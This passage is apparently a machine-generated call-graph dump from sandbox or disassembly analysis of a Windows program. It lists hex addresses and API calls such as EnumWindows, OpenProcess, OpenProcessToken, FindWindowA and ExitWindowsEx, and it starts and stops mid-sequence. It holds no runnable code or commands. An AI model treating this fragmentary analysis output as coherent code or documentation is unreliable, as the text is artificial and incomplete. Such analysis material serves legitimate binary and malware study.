121120->121121 121122 1103087a 121121->121122 121123 1105bcc0 427 API calls 121122->121123 121124 110308a0 121123->121124 121125 11026dc0 122 API calls 121124->121125 121126 110308a5 121125->121126 121127 1100d4f0 FreeLibrary 121126->121127 121128 110308c0 121127->121128 121129 1100d210 wsprintfA 121128->121129 121132 110308d9 121128->121132 121130 110308ce 121129->121130 121131 11142790 std::_Mutex::_Mutex 21 API calls 121130->121131 121131->121132 121133 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121132->121133 121134 11030a3f 121133->121134 121135->121082 121136 11030ac1 121137 11030b29 GetWindowsDirectoryA 121136->121137 121138 11030ac8 121136->121138 121139 11030b38 121137->121139 121167 11030d9b std::ios_base::_Ios_base_dtor 121137->121167 121141 1105d350 79 API calls 121139->121141 121140 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121142 11030e14 121140->121142 121143 11030b51 121141->121143 121144 1110c4b0 std::_Mutex::_Mutex 265 API calls 121143->121144 121145 11030b9d 121144->121145 121146 11030bb4 121145->121146 121172 1104f6c0 266 API calls 3 library calls 121145->121172 121148 1110c4b0 std::_Mutex::_Mutex 265 API calls 121146->121148 121149 11030bc8 121148->121149 121150 11030be3 EnumWindows 121149->121150 121173 1104f6c0 266 API calls 3 library calls 121149->121173 121174 11140f70 121150->121174 121354 1102fb50 GetWindowRect 121150->121354 121156 11030c1f 121157 11030c50 EnumWindows 121156->121157 121158 11030c77 121157->121158 121159 11030c6a Sleep 121157->121159 121384 1102fb50 288 API calls 2 library calls 121157->121384 121160 11030c83 121158->121160 121161 11030c8d 121158->121161 121159->121157 121159->121158 121162 11142790 std::_Mutex::_Mutex 21 API calls 121160->121162 121163 11030ca2 Sleep 121161->121163 121165 11030ca7 121161->121165 121162->121161 121169 11030cc3 121163->121169 121166 11030cb9 Sleep 121165->121166 121165->121169 121199 11027a90 270 API calls 3 library calls 121165->121199 121166->121165 121166->121169 121167->121140 121168 11142790 std::_Mutex::_Mutex 21 API calls 121168->121169 121169->121167 121169->121168 121170 11030d67 SendMessageA 121169->121170 121171 11030d10 121169->121171 121170->121171 121171->121167 121171->121169 121171->121170 121172->121146 121173->121150 121175 11140f92 121174->121175 121179 11140fa9 std::_Mutex::_Mutex 121174->121179 121225 110290c0 265 API calls 2 library calls 121175->121225 121178 11141137 121180 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121178->121180 121179->121178 121181 11140fdc GetModuleFileNameA 121179->121181 121182 11030c11 121180->121182 121200 11080c50 121181->121200 121198 11143200 267 API calls 121182->121198 121184 11140ff1 121185 11141001 SHGetFolderPathA 121184->121185 121186 111410e8 121184->121186 121188 1114102e 121185->121188 121189 1114104d SHGetFolderPathA 121185->121189 121187 1113e630 std::_Mutex::_Mutex 262 API calls 121186->121187 121187->121178 121188->121189 121192 11141034 121188->121192 121191 11141082 std::_Mutex::_Mutex 121189->121191 121204 1102a220 121191->121204 121226 110290c0 265 API calls 2 library calls 121192->121226 121198->121156 121199->121165 121201 11080c63 _strrchr 121200->121201 121203 11080c7a std::_Mutex::_Mutex 121201->121203 121227 11080aa0 IsDBCSLeadByte 121201->121227 121203->121184 121228 11028260 121204->121228 121206 1102a22e 121207 11140a10 121206->121207 121208 11140a9a 121207->121208 121209 11140a1b 121207->121209 121208->121186 121209->121208 121210 11140a2b GetFileAttributesA 121209->121210 121211 11140a45 121210->121211 121212 11140a37 121210->121212 121213 11161cea __strdup 66 API calls 121211->121213 121212->121186 121214 11140a4c 121213->121214 121215 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 121214->121215 121216 11140a56 121215->121216 121217 11140a10 std::_Mutex::_Mutex 67 API calls 121216->121217 121223 11140a73 121216->121223 121218 11140a66 121217->121218 121219 11140a7c 121218->121219 121220 11140a6e 121218->121220 121222 1115f2c5 _free 66 API calls 121219->121222 121221 1115f2c5 _free 66 API calls 121220->121221 121221->121223 121224 11140a81 CreateDirectoryA 121222->121224 121223->121186 121224->121223 121227->121203 121229 11028283 121228->121229 121230 110288cb 121228->121230 121231 11028340 GetModuleFileNameA 121229->121231 121240 110282b8 121229->121240 121233 11028967 121230->121233 121234 1102897a 121230->121234 121232 11028361 _strrchr 121231->121232 121239 1116067b std::_Mutex::_Mutex 143 API calls 121232->121239 121236 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121233->121236 121235 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121234->121235 121238 1102898b 121235->121238 121237 11028976 121236->121237 121237->121206 121238->121206 121241 1102833b 121239->121241 121240->121240 121242 1116067b std::_Mutex::_Mutex 143 API calls 121240->121242 121241->121230 121258 110264a0 81 API calls 2 library calls 121241->121258 121242->121241 121244 110283b4 121245 1115f4c7 std::_Mutex::_Mutex 79 API calls 121244->121245 121254 11028835 121244->121254 121247 110283c5 121245->121247 121247->121254 121259 11026310 66 API calls 3 library calls 121247->121259 121249 110283f0 121260 110264a0 81 API calls 2 library calls 121249->121260 121251 11028400 std::_Mutex::_Mutex 121251->121254 121261 110264a0 81 API calls 2 library calls 121251->121261 121264 11160445 121254->121264 121256 11160d5e 85 API calls _LanguageEnumProc@4 121257 11028423 __mbschr_l 121256->121257 121257->121254 121257->121256 121262 11026310 66 API calls 3 library calls 121257->121262 121263 110264a0 81 API calls 2 library calls 121257->121263 121258->121244 121259->121249 121260->121251 121261->121257 121262->121257 121263->121257 121265 11160451 __tsopen_nolock 121264->121265 121266 11160463 121265->121266 121267 11160478 121265->121267 121299 111659cf 66 API calls __getptd_noexit 121266->121299 121274 11160473 __tsopen_nolock 121267->121274 121277 11167679 121267->121277 121270 11160468 121300 1116a5e4 11 API calls __tsopen_nolock 121270->121300 121274->121230 121278 111676ad EnterCriticalSection 121277->121278 121279 1116768b 121277->121279 121281 11160491 121278->121281 121279->121278 121280 11167693 121279->121280 121282 1116fdec __lock 66 API calls 121280->121282 121283 111603d8 121281->121283 121282->121281 121284 111603fd 121283->121284 121285 111603e9 121283->121285 121291 111603f9 121284->121291 121302 11167757 121284->121302 121342 111659cf 66 API calls __getptd_noexit 121285->121342 121288 111603ee 121343 1116a5e4 11 API calls __tsopen_nolock 121288->121343 121301 111604b1 LeaveCriticalSection LeaveCriticalSection __ftelli64 121291->121301 121295 11160417 121319 1116d6b4 121295->121319 121297 1116041d 121297->121291 121298 1115f2c5 _free 66 API calls 121297->121298 121298->121291 121299->121270 121300->121274 121301->121274 121303 11167770 121302->121303 121304 11160409 121302->121304 121303->121304 121305 11165967 __ungetc_nolock 66 API calls 121303->121305 121308 1116d778 121304->121308 121306 1116778b 121305->121306 121344 1116e8f4 97 API calls 4 library calls 121306->121344 121309 1116d788 121308->121309 121311 11160411 121308->121311 121310 1115f2c5 _free 66 API calls 121309->121310 121309->121311 121310->121311 121312 11165967 121311->121312 121313 11165973 121312->121313 121314 11165988 121312->121314 121345 111659cf 66 API calls __getptd_noexit 121313->121345 121314->121295 121316 11165978 121346 1116a5e4 11 API calls __tsopen_nolock 121316->121346 121318 11165983 121318->121295 121320 1116d6c0 __tsopen_nolock 121319->121320 121321 1116d6c8 121320->121321 121322 1116d6e3 121320->121322 121347 111659e2 66 API calls __getptd_noexit 121321->121347 121323 1116d6ef 121322->121323 121328 1116d729 121322->121328 121349 111659e2 66 API calls __getptd_noexit 121323->121349 121326 1116d6cd 121348 111659cf 66 API calls __getptd_noexit 121326->121348 121327 1116d6f4 121350 111659cf 66 API calls __getptd_noexit 121327->121350 121331 111730e5 ___lock_fhandle 68 API calls 121328->121331 121333 1116d72f 121331->121333 121332 1116d6fc 121351 1116a5e4 11 API calls __tsopen_nolock 121332->121351 121335 1116d73d 121333->121335 121336 1116d749 121333->121336 121339 1116d618 __close_nolock 69 API calls 121335->121339 121352 111659cf 66 API calls __getptd_noexit 121336->121352 121338 1116d6d5 __tsopen_nolock 121338->121297 121340 1116d743 121339->121340 121353 1116d770 LeaveCriticalSection __unlock_fhandle 121340->121353 121342->121288 121343->121291 121344->121304 121345->121316 121346->121318 121347->121326 121348->121338 121349->121327 121350->121332 121351->121338 121352->121340 121353->121338 121355 1102fdc7 121354->121355 121356 1102fbc4 121354->121356 121357 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121355->121357 121356->121355 121358 1102fbcc GetWindowLongA 121356->121358 121360 1102fde4 121357->121360 121358->121355 121359 1102fbe6 GetClassNameA 121358->121359 121361 1102fc00 121359->121361 121361->121355 121362 1102fc2d GetWindowThreadProcessId OpenProcess 121361->121362 121362->121355 121363 1102fc59 121362->121363 121385 11025980 LoadLibraryA 121363->121385 121365 1102fc64 121386 110259b0 121365->121386 121367 1102fc83 121368 1102fdaf CloseHandle 121367->121368 121370 110ce2d0 265 API calls 121367->121370 121368->121355 121369 1102fdc0 FreeLibrary 121368->121369 121369->121355 121371 1102fc9d 121370->121371 121396 110cddf0 86 API calls std::_Mutex::_Mutex 121371->121396 121373 1102fcb1 121374 1102fda0 121373->121374 121375 1102fcbe 121373->121375 121382 1102fcfb 121373->121382 121376 110ce380 265 API calls 121374->121376 121377 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 121375->121377 121376->121368 121378 1102fccc 121377->121378 121379 11142790 std::_Mutex::_Mutex 21 API calls 121378->121379 121380 1102fcf0 121379->121380 121397 111253c0 276 API calls 4 library calls 121380->121397 121382->121374 121383 11142790 std::_Mutex::_Mutex 21 API calls 121382->121383 121383->121380 121385->121365 121387 110259be GetProcAddress 121386->121387 121388 110259cf 121386->121388 121387->121388 121389 110259e8 121388->121389 121390 110259dc K32GetProcessImageFileNameA 121388->121390 121392 110259ee GetProcAddress 121389->121392 121393 110259ff 121389->121393 121390->121389 121391 11025a21 121390->121391 121391->121367 121392->121393 121394 11025a17 SetLastError 121393->121394 121395 11025a06 121393->121395 121394->121391 121395->121367 121396->121373 121397->121374 121398 111321f0 121399 111321f9 121398->121399 121405 11132228 121398->121405 121406 111416c0 121399->121406 121403 11132207 121404 1105d350 79 API calls 121403->121404 121403->121405 121404->121405 121407 11141440 std::_Mutex::_Mutex 90 API calls 121406->121407 121408 111321fe 121407->121408 121408->121405 121409 1112fd90 121408->121409 121410 1112fdb1 std::_Mutex::_Mutex 121409->121410 121433 1112fed1 121409->121433 121413 1112fdc6 121410->121413 121414 1112fddd 121410->121414 121411 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121412 1112fee5 121411->121412 121412->121403 121415 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121413->121415 121416 11140f70 std::_Mutex::_Mutex 265 API calls 121414->121416 121417 1112fdd9 121415->121417 121418 1112fdea wsprintfA 121416->121418 121417->121403 121437 1113f5d0 121418->121437 121420 1112fe10 121421 1112fe17 121420->121421 121422 1112fe88 121420->121422 121448 110b69b0 121421->121448 121424 11140f70 std::_Mutex::_Mutex 265 API calls 121422->121424 121426 1112fe94 wsprintfA 121424->121426 121425 1112fe22 121427 1112feb4 121425->121427 121428 1112fe2a GetTickCount SHGetFolderPathA GetTickCount 121425->121428 121429 1113f5d0 std::_Mutex::_Mutex 8 API calls 121426->121429 121430 11142790 std::_Mutex::_Mutex 21 API calls 121427->121430 121431 1112fe60 121428->121431 121432 1112fe55 121428->121432 121429->121427 121430->121433 121431->121427 121463 110eb620 9 API calls 121431->121463 121434 11142790 std::_Mutex::_Mutex 21 API calls 121432->121434 121433->121411 121434->121431 121436 1112fe83 121436->121427 121438 1113f5f1 CreateFileA 121437->121438 121440 1113f68e CloseHandle 121438->121440 121441 1113f66e 121438->121441 121444 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121440->121444 121442 1113f672 CreateFileA 121441->121442 121443 1113f6ab 121441->121443 121442->121440 121442->121443 121445 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121443->121445 121446 1113f6a7 121444->121446 121447 1113f6ba 121445->121447 121446->121420 121447->121420 121449 110b69c3 GetModuleHandleA GetProcAddress 121448->121449 121450 110b6a84 121448->121450 121451 110b6a0a GetCurrentProcessId OpenProcess 121449->121451 121452 110b69ef GetCurrentProcessId 121449->121452 121450->121425 121453 110b6a27 OpenProcessToken 121451->121453 121455 110b6a57 121451->121455 121456 110b69f8 121452->121456 121454 110b6a38 121453->121454 121453->121455 121454->121455 121457 110b6a3f GetTokenInformation 121454->121457 121459 110b6a73 CloseHandle 121455->121459 121460 110b6a76 121455->121460 121456->121451 121458 110b69fc 121456->121458 121457->121455 121458->121425 121459->121460 121461 110b6a7a CloseHandle 121460->121461 121462 110b6a7d 121460->121462 121461->121462 121462->121450 121463->121436 121464 111584f0 121465 11158504 121464->121465 121466 111584fc 121464->121466 121467 1115f88b _calloc 66 API calls 121465->121467 121468 11158518 121467->121468 121469 11158524 121468->121469 121470 11158650 121468->121470 121476 11158130 CoInitializeSecurity CoCreateInstance 121468->121476 121472 1115f2c5 _free 66 API calls 121470->121472 121473 11158678 121472->121473 121474 11158541 121474->121470 121475 11158634 SetLastError 121474->121475 121475->121474 121477 111581a5 wsprintfW SysAllocString 121476->121477 121478 11158324 121476->121478 121483 111581eb 121477->121483 121479 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121478->121479 121481 11158350 121479->121481 121480 11158311 SysFreeString 121480->121478 121481->121474 121482 111582f9 121482->121480 121483->121480 121483->121482 121483->121483 121484 1115827c 121483->121484 121485 1115826a wsprintfW 121483->121485 121493 11096560 121484->121493 121485->121484 121487 1115828e 121488 11096560 266 API calls 121487->121488 121489 111582a3 121488->121489 121498 11096620 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 121489->121498 121491 111582e7 121499 11096620 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 121491->121499 121494 1110c4b0 std::_Mutex::_Mutex 265 API calls 121493->121494 121495 11096593 121494->121495 121496 110965a6 SysAllocString 121495->121496 121497 110965c4 _com_util::ConvertStringToBSTR 121495->121497 121496->121497 121497->121487 121498->121491 121499->121482 121500 1102ce84 121501 1102ce91 121500->121501 121502 1102ceb2 121501->121502 121587 1109e270 275 API calls std::_Mutex::_Mutex 121501->121587 121588 11028ae0 454 API calls std::_Mutex::_Mutex 121502->121588 121505 1102cec3 121570 11027cd0 SetEvent 121505->121570 121507 1102cec8 121508 1102ced2 121507->121508 121509 1102cedd 121507->121509 121589 110ea630 1011 API calls 121508->121589 121511 1102cefa 121509->121511 121512 1102ceff 121509->121512 121590 11058ae0 SetEvent 121511->121590 121513 1102cf07 121512->121513 121514 1102cf3e 121512->121514 121513->121514 121521 1102cf33 Sleep 121513->121521 121516 11142790 std::_Mutex::_Mutex 21 API calls 121514->121516 121517 1102cf48 121516->121517 121518 1102cf55 121517->121518 121519 1102cf86 121517->121519 121518->121517 121522 1105d350 79 API calls 121518->121522 121520 1102cf83 121519->121520 121571 110af030 121519->121571 121520->121519 121521->121514 121523 1102cf78 121522->121523 121523->121519 121591 1102cbe0 294 API calls std::_Mutex::_Mutex 121523->121591 121530 1102cfca 121531 1102cfdd 121530->121531 121593 11132790 299 API calls 5 library calls 121530->121593 121532 1100d4f0 FreeLibrary 121531->121532 121534 1102d2e9 121532->121534 121535 1100d210 wsprintfA 121534->121535 121536 1102d300 121534->121536 121537 1102d2f5 121535->121537 121539 1102d327 GetModuleFileNameA GetFileAttributesA 121536->121539 121546 1102d443 121536->121546 121538 11142790 std::_Mutex::_Mutex 21 API calls 121537->121538 121538->121536 121540 1102d34f 121539->121540 121539->121546 121542 1110c4b0 std::_Mutex::_Mutex 265 API calls 121540->121542 121541 11142790 std::_Mutex::_Mutex 21 API calls 121543 1102d4f2 121541->121543 121544 1102d356 121542->121544 121604 11142750 FreeLibrary 121543->121604 121594 1113ee00 121544->121594 121546->121541 121547 1102d4fa 121549 1102d536 121547->121549 121550 1102d524 ExitWindowsEx 121547->121550 121551 1102d514 ExitWindowsEx Sleep 121547->121551 121552 1102d546 121549->121552 121553 1102d53b Sleep 121549->121553 121550->121549 121551->121550 121554 11142790 std::_Mutex::_Mutex 21 API calls 121552->121554 121553->121552 121556 1102d550 ExitProcess 121554->121556 121557 1102d378 121558 1113ef50 86 API calls 121557->121558 121559 1102d39d 121558->121559 121559->121546 121560 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 121559->121560 121561 1102d3b3 121560->121561 121562 1102d3ce _memset 121561->121562 121602 110290c0 265 API calls 2 library calls 121561->121602 121564 1102d3e8 FindFirstFileA 121562->121564 121565 1102d408 FindNextFileA 121564->121565 121567 1102d428 FindClose 121565->121567 121568 1102d434 121567->121568 121603 11123690 291 API calls 5 library calls 121568->121603 121570->121507 121605 1107f700 121571->121605 121576 1102cfaa 121580 110e8cf0 121576->121580 121577 110af077 121617 110290c0 265 API calls 2 library calls 121577->121617 121581 110af030 267 API calls 121580->121581 121582 110e8d1d 121581->121582 121633 110e80c0 121582->121633 121586 1102cfb5 121592 110af220 267 API calls std::_Mutex::_Mutex 121586->121592 121587->121502 121588->121505 121589->121509 121590->121512 121591->121520 121592->121530 121593->121531 121595 1113ee48 121594->121595 121598 1113ee0e 121594->121598 121596 1113e630 std::_Mutex::_Mutex 265 API calls 121595->121596 121597 1113ee50 121596->121597 121597->121557 121598->121595 121599 1113ee32 121598->121599 121646 1113e6b0 267 API calls std::_Mutex::_Mutex 121599->121646 121601 1113ee38 121601->121557 121603->121546 121604->121547 121606 1107f724 121605->121606 121607 1107f73f 121606->121607 121608 1107f728 121606->121608 121610 1107f73c 121607->121610 121611 1107f758 121607->121611 121618 110290c0 265 API calls 2 library calls 121608->121618 121610->121607 121619 110290c0 265 API calls 2 library calls 121610->121619 121614 110af020 121611->121614 121620 110803e0 121614->121620 121621 1108042d 121620->121621 121622 11080401 121620->121622 121625 1108047a wsprintfA 121621->121625 121626 11080455 wsprintfA 121621->121626 121622->121621 121623 1108041b 121622->121623 121624 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121623->121624 121628 11080429 121624->121628 121632 110290c0 265 API calls 2 library calls 121625->121632 121626->121621 121628->121576 121628->121577 121635 110e80cb 121633->121635 121634 110e8165 121643 110af220 267 API calls std::_Mutex::_Mutex 121634->121643 121635->121634 121636 110e80ee 121635->121636 121637 110e8105 121635->121637 121644 110290c0 265 API calls 2 library calls 121636->121644 121639 110e8102 121637->121639 121640 110e8132 SendMessageTimeoutA 121637->121640 121639->121637 121645 110290c0 265 API calls 2 library calls 121639->121645 121640->121634 121643->121586 121646->121601 121647 6cd65ae6 121648 6cd65af6 121647->121648 121649 6cd65af1 121647->121649 121653 6cd659f0 121648->121653 121661 6cd6f28f GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 121649->121661 121652 6cd65b04 121654 6cd659fc __setmode 121653->121654 121657 6cd65a49 ___DllMainCRTStartup 121654->121657 121660 6cd65a99 __setmode 121654->121660 121662 6cd6588c 121654->121662 121656 6cd65a79 121658 6cd6588c __CRT_INIT@12 149 API calls 121656->121658 121656->121660 121657->121656 121659 6cd6588c __CRT_INIT@12 149 API calls 121657->121659 121657->121660 121658->121660 121659->121656 121660->121652 121661->121648 121663 6cd65898 __setmode 121662->121663 121664 6cd658a0 121663->121664 121665 6cd6591a 121663->121665 121714 6cd6607f HeapCreate 121664->121714 121666 6cd65920 121665->121666 121667 6cd6597b 121665->121667 121673 6cd6593e 121666->121673 121681 6cd658a9 __setmode 121666->121681 121733 6cd65e35 66 API calls _doexit 121666->121733 121670 6cd65980 121667->121670 121671 6cd659d9 121667->121671 121669 6cd658a5 121674 6cd658b0 121669->121674 121669->121681 121715 6cd66da9 TlsGetValue 121670->121715 121671->121681 121745 6cd670ad 79 API calls __freefls@4 121671->121745 121679 6cd65952 121673->121679 121734 6cd69b09 67 API calls _free 121673->121734 121724 6cd67127 86 API calls 4 library calls 121674->121724 121737 6cd65965 70 API calls __mtterm 121679->121737 121681->121657 121683 6cd658b5 __RTC_Initialize 121686 6cd658b9 121683->121686 121692 6cd658c5 GetCommandLineA 121683->121692 121725 6cd6609d HeapDestroy 121686->121725 121687 6cd65948 121735 6cd66dfa 70 API calls _free 121687->121735 121688 6cd6599d DecodePointer 121695 6cd659b2 121688->121695 121691 6cd658be 121691->121681 121726 6cd6f016 71 API calls 2 library calls 121692->121726 121693 6cd6594d 121736 6cd6609d HeapDestroy 121693->121736 121698 6cd659b6 121695->121698 121699 6cd659cd 121695->121699 121697 6cd658d5 121727 6cd698c4 73 API calls __calloc_crt 121697->121727 121738 6cd66e37 66 API calls 4 library calls 121698->121738 121739 6cd61bfd 121699->121739 121703 6cd658df 121705 6cd658e3 121703->121705 121729 6cd6ef5b 95 API calls 3 library calls 121703->121729 121704 6cd659bd GetCurrentThreadId 121704->121681 121728 6cd66dfa 70 API calls _free 121705->121728 121708 6cd658ef 121709 6cd65903 121708->121709 121730 6cd6ecd4 94 API calls 6 library calls 121708->121730 121709->121691 121732 6cd69b09 67 API calls _free 121709->121732 121712 6cd658f8 121712->121709 121731 6cd65c32 77 API calls 4 library calls 121712->121731 121714->121669 121716 6cd66dbe DecodePointer TlsSetValue 121715->121716 121717 6cd65985 121715->121717 121716->121717 121718 6cd6d3f5 121717->121718 121719 6cd6d3fe 121718->121719 121721 6cd65991 121719->121721 121722 6cd6d41c Sleep 121719->121722 121746 6cd6a082 121719->121746 121721->121681 121721->121688 121723 6cd6d431 121722->121723 121723->121719 121723->121721 121724->121683 121725->121691 121726->121697 121727->121703 121728->121686 121729->121708 121730->121712 121731->121709 121732->121705 121733->121673 121734->121687 121735->121693 121736->121679 121737->121681 121738->121704 121740 6cd61c31 _free 121739->121740 121741 6cd61c08 HeapFree 121739->121741 121740->121681 121741->121740 121742 6cd61c1d 121741->121742 121757 6cd660f9 66 API calls __getptd_noexit 121742->121757 121744 6cd61c23 GetLastError 121744->121740 121745->121681 121747 6cd6a08e 121746->121747 121753 6cd6a0a9 121746->121753 121748 6cd6a09a 121747->121748 121747->121753 121755 6cd660f9 66 API calls __getptd_noexit 121748->121755 121750 6cd6a0bc RtlAllocateHeap 121750->121753 121754 6cd6a0e3 121750->121754 121751 6cd6a09f 121751->121719 121753->121750 121753->121754 121756 6cd6622a DecodePointer 121753->121756 121754->121719 121755->121751 121756->121753 121757->121744 121758 11112c20 121759 111416c0 std::_Mutex::_Mutex 90 API calls 121758->121759 121760 11112c3e 121759->121760 121761 11112c65 121760->121761 121763 11112c48 121760->121763 121767 11141440 std::_Mutex::_Mutex 90 API calls 121760->121767 121762 11112c74 CoInitialize CoCreateInstance 121761->121762 121761->121763 121764 11112ca4 LoadLibraryA 121762->121764 121765 11112c99 121762->121765 121766 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121763->121766 121764->121765 121768 11112cc0 GetProcAddress 121764->121768 121772 11112d81 CoUninitialize 121765->121772 121773 11112d87 121765->121773 121769 11112c56 121766->121769 121767->121761 121770 11112cd0 SHGetSettings 121768->121770 121771 11112ce4 FreeLibrary 121768->121771 121770->121771 121771->121765 121772->121773 121774 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121773->121774 121775 11112d96 121774->121775 121776 111700e5 121777 11167e95 __getptd 66 API calls 121776->121777 121778 11170102 _LcidFromHexString 121777->121778 121779 1117010f GetLocaleInfoA 121778->121779 121780 11170136 121779->121780 121781 11170142 121779->121781 121783 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121780->121783 121799 11160d5e 85 API calls 2 library calls 121781->121799 121785 111702b2 121783->121785 121784 1117014e 121786 11170158 GetLocaleInfoA 121784->121786 121793 11170188 _CountryEnumProc@4 _strlen 121784->121793 121786->121780 121788 11170177 121786->121788 121787 111701fb GetLocaleInfoA 121787->121780 121789 1117021e 121787->121789 121800 11160d5e 85 API calls 2 library calls 121788->121800 121802 11160d5e 85 API calls 2 library calls 121789->121802 121792 11170229 121792->121780 121797 11170231 _strlen 121792->121797 121803 11160d5e 85 API calls 2 library calls 121792->121803 121793->121780 121793->121787 121794 11170182 121794->121793 121801 1115fe64 85 API calls 2 library calls 121794->121801 121797->121780 121804 1117008a GetLocaleInfoW _GetPrimaryLen _strlen 121797->121804 121799->121784 121800->121794 121801->121793 121802->121792 121803->121797 121804->121780 121805 1102dff0 121806 1102e033 121805->121806 121807 1110c4b0 std::_Mutex::_Mutex 265 API calls 121806->121807 121808 1102e03a 121807->121808 121809 1113ee00 267 API calls 121808->121809 121810 1102e05a 121808->121810 121809->121810 121811 1113ef50 86 API calls 121810->121811 121812 1102e084 121811->121812 121813 1102e0b1 121812->121813 121814 11080cc0 86 API calls 121812->121814 121816 1113ef50 86 API calls 121813->121816 121815 1102e096 121814->121815 121817 11080cc0 86 API calls 121815->121817 121818 1102e0da 121816->121818 121817->121813 121819 1115f4c7 std::_Mutex::_Mutex 79 API calls 121818->121819 121823 1102e0e7 121818->121823 121819->121823 121820 1102e116 121821 1102e188 121820->121821 121822 1102e16f GetSystemMetrics 121820->121822 121827 1102e1a2 CreateEventA 121821->121827 121822->121821 121824 1102e17e 121822->121824 121823->121820 121825 11141440 std::_Mutex::_Mutex 90 API calls 121823->121825 121826 11142790 std::_Mutex::_Mutex 21 API calls 121824->121826 121825->121820 121826->121821 121828 1102e1b5 121827->121828 121829 1102e1c9 121827->121829 122791 110290c0 265 API calls 2 library calls 121828->122791 121830 1110c4b0 std::_Mutex::_Mutex 265 API calls 121829->121830 121832 1102e1d0 121830->121832 121833 1102e1f0 121832->121833 121834 1110d180 425 API calls 121832->121834 121835 1110c4b0 std::_Mutex::_Mutex 265 API calls 121833->121835 121834->121833 121836 1102e204 121835->121836 121837 1110d180 425 API calls 121836->121837 121838 1102e224 121836->121838 121837->121838 121839 1110c4b0 std::_Mutex::_Mutex 265 API calls 121838->121839 121840 1102e2a3 121839->121840 121841 1102e2d3 121840->121841 121842 110605c0 301 API calls 121840->121842 121843 1110c4b0 std::_Mutex::_Mutex 265 API calls 121841->121843 121842->121841 121844 1102e2ed 121843->121844 121845 1102e312 FindWindowA 121844->121845 121847 11060230 293 API calls 121844->121847 121848 1102e467 121845->121848 121849 1102e34b 121845->121849 121847->121845 121850 11060a10 268 API calls 121848->121850 121849->121848 121852 1102e363 GetWindowThreadProcessId 121849->121852 121851 1102e479 121850->121851 121853 11060a10 268 API calls 121851->121853 121854 11142790 std::_Mutex::_Mutex 21 API calls 121852->121854 121855 1102e485 121853->121855 121856 1102e389 OpenProcess 121854->121856 121857 11060a10 268 API calls 121855->121857 121856->121848 121858 1102e3a9 121856->121858 121859 1102e491 121857->121859 122792 11093b90 105 API calls 121858->122792 121860 1102e4a8 121859->121860 121861 1102e49f 121859->121861 122192 11141cb0 121860->122192 122793 110279a0 119 API calls 2 library calls 121861->122793 121864 1102e3c8 121867 11142790 std::_Mutex::_Mutex 21 API calls 121864->121867 121865 1102e4a4 121865->121860 121869 1102e3dc 121867->121869 121868 1102e4b7 122207 11141160 ExpandEnvironmentStringsA 121868->122207 121870 1102e41b CloseHandle FindWindowA 121869->121870 121874 11142790 std::_Mutex::_Mutex 21 API calls 121869->121874 121871 1102e443 GetWindowThreadProcessId 121870->121871 121872 1102e457 121870->121872 121871->121872 121876 11142790 std::_Mutex::_Mutex 21 API calls 121872->121876 121875 1102e3ee SendMessageA WaitForSingleObject 121874->121875 121875->121870 121878 1102e40e 121875->121878 121879 1102e464 121876->121879 121881 11142790 std::_Mutex::_Mutex 21 API calls 121878->121881 121879->121848 121880 1113f5d0 std::_Mutex::_Mutex 8 API calls 121882 1102e4da 121880->121882 121883 1102e418 121881->121883 121884 1102e5b1 121882->121884 122220 110623a0 121882->122220 121883->121870 122235 110270d0 121884->122235 121890 1102e5d6 std::_Mutex::_Mutex 121892 1102a220 std::_Mutex::_Mutex 145 API calls 121890->121892 121901 1102e5f1 121890->121901 121895 1102e5ea 121892->121895 121898 1102a220 std::_Mutex::_Mutex 145 API calls 121895->121898 121898->121901 122255 11027de0 121901->122255 122193 11140f70 std::_Mutex::_Mutex 265 API calls 122192->122193 122194 11141ccb wsprintfA 122193->122194 122195 11140f70 std::_Mutex::_Mutex 265 API calls 122194->122195 122196 11141ce7 wsprintfA 122195->122196 122197 1113f5d0 std::_Mutex::_Mutex 8 API calls 122196->122197 122198 11141d04 122197->122198 122199 11141d30 122198->122199 122200 1113f5d0 std::_Mutex::_Mutex 8 API calls 122198->122200 122201 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 122199->122201 122202 11141d19 122200->122202 122203 11141d3c 122201->122203 122202->122199 122204 11141d20 122202->122204 122203->121868 122205 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 122204->122205 122206 11141d2c 122205->122206 122206->121868 122208 11141197 122207->122208 122209 111411a4 122208->122209 122210 111411b4 std::_Mutex::_Mutex 122208->122210 122211 111411ce 122208->122211 122213 1113e630 std::_Mutex::_Mutex 265 API calls 122209->122213 122214 111411c5 GetModuleFileNameA 122210->122214 122212 11140f70 std::_Mutex::_Mutex 265 API calls 122211->122212 122215 111411d4 122212->122215 122216 11141228 122213->122216 122214->122215 122218 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 122215->122218 122217 1115e3e1 